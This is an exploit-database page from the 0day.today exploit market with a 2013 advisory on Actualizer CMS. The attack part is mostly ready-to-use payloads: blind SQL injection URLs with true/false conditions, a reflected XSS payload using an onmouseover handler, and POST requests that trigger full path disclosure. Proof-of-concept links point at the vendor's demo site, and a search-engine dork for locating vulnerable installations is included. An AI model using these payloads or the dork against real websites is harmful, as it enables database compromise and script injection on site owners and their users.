[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Actualizer CMS - Multiple Vulnerabilities

Author
Smash_
Risk
[
Security Risk High
]
0day-ID
0day-ID-21268
Category
web applications
Date add
22-09-2013
Platform
php
#Title: Actualizer CMS - Multiple Vulnerabilities
#Date: 22.09.2013
#Tested on: Linux 3.0 - 3.9 (95%)
#Vendor: actualizer.pl
#Demo: demo.actualizer.pl
#Dork: intext:"Powered by Actualizer & Heuristic"
#Contact: smash@devilteam.pl

1. Blind SQL Injection

host/galeria/galeria-2/gal,1'%20or%20'1'='2.html - false
host/galeria/galeria-2/gal,1'%20or%20'1'='1.html - true

PoC:
http://demo.actualizer.pl/galeria/galeria-2/gal,1'%20or%20'1'='2.html


2. Cross Site Scripting

host/katalog/nowosci/archiwum/year," onmouseover%3dalert(666) bad%3d".html

PoC:
demo.actualizer.pl/katalog/nowosci/archiwum/year," onmouseover%3dalert(666) bad%3d".html


3. Full Path Disclosure

host/newsletter.php 
POST: action=save&cat=666%email[]=asdf@asdf.com&imie=devil

host/konto/rejestracja
POST (multipart): login=1

#  0day.today [2024-12-26]  #